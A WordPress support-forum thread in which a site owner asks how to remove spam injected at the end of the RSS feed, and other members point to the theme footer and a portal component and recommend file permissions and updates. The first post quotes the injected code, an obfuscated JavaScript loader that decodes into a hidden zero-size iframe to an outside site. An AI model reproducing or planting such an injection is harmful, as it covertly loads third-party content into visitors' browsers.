WordPress.org

Ready to get started?Download WordPress

Forums

Repairing a hackers addition to RSS feed. (4 posts)

  1. NWLB
    Member
    Posted 6 years ago #

    Recently I noticed that my RSS feeds were corrupting. Looking into the feed and using Feedburners validator, I noticed a spam element had been added to the very end of the RSS feed. (And example is noted below.) When I uninstalled, and re-installed all the posts, the problem when away, only to reappear the next day.

    I'm working to boost security to the site, but need to know what file I might look for, to eliminate this from the RSS feed.

    Example code from my RSS feed:
    "# </rss>
    # <!-- ~ --><script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf%264Ekbwbtdsjqu%264F%261E%261Bepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00xxx/gsff31/dpn0qpsubm0joefy/qiq%264Gbgg%264Esb%7Bfdd%2638%2631xjeui%264E%26381%2638%2631ifjhiu%264E%26381%2638%2631gsbnfcpsefs%264E%26381%2638%264F%264D0jgsbnf%264F%2633%263%3A%261E%261B%264D0tdsjqu%264F1')</script><!-- ~ -->"

  2. whooami
    Member
    Posted 6 years ago #

    thats not just in your feed; view your source on the front page of your site.

    Start by checking your current theme's footer.php for the javascript.

    If its not in there, check all the other files.

    ... boost security ..
    1. In the future, you want to insure your files have safe and sane permissions:

    directories: 755
    files: 644

    2. Pay attention to your site.

    3. Stay on top of updates. You are presently using 2.2.2 -- thats not current.

  3. whooami
    Member
    Posted 6 years ago #

    After looking closer - you are using frames..

    This is WP generated:

    http://royalcaribbeanfan.cruiseaficionados.com/wp/?p=166

    and there is no javascript.

    http://royalcaribbeanfan.cruiseaficionados.com/portal/component/option,com_frontpage/Itemid,1/

    That is your front page, and clearly has the js at the bottom.

    What this suggests is that whatever you are using for your "portal" is where the problem lies.

  4. willyrs
    Member
    Posted 6 years ago #

    This post helped solve my problem too---and I'm going to now make sure all of our permissions are set correctly.

    Just to make sure I understand this: I'll set every directory (folder) to 755. I'll set every individual file to 644.

    Are there any exceptions? For example, are there typically plugins that need to have looser permissions? And if so, does that mean setting the plugin folder itself and the wp-content folder to those same permissions?

    Thanks.

    Willy

Topic Closed

This topic has been closed to new replies.

About this Topic